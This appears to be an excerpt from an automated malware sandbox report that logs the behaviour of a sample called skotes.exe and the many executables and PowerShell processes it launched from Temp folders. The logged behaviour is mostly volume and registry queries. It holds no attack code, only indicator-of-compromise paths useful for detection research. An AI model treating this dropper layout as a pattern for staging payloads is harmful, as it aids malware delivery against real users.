Source: skotes.exe, skotes.exe, 00000002.00000002.1795697231.0000000000CAE000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: .Program Manager
Source: 8b3fbc1053.exe, 00000039.00000002.3076272452.0000000000601000.00000040.00000001.01000000.0000001E.sdmp	Binary or memory string: "PProgram Manager

Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072553001\750afc9298.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072553001\750afc9298.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072557001\318ea12e54.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072557001\318ea12e54.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072558001\7251e9a205.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072558001\7251e9a205.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072559001\85abde4902.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072559001\85abde4902.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072560001\6ebe63e8d0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072560001\6ebe63e8d0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072561001\c6de8b12c0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072561001\c6de8b12c0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072562001\fbf74eb9d4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072562001\fbf74eb9d4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072563001\4b3b305d14.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072563001\4b3b305d14.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072564001\77c6b3ca0a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072565001\e6710ad235.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072565001\e6710ad235.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072566001\a4377b3e83.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072566001\a4377b3e83.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072567001\6bf1f06d50.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072567001\6bf1f06d50.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072568001\88823343d6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072568001\88823343d6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072569001\f3f4cac77b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072569001\f3f4cac77b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
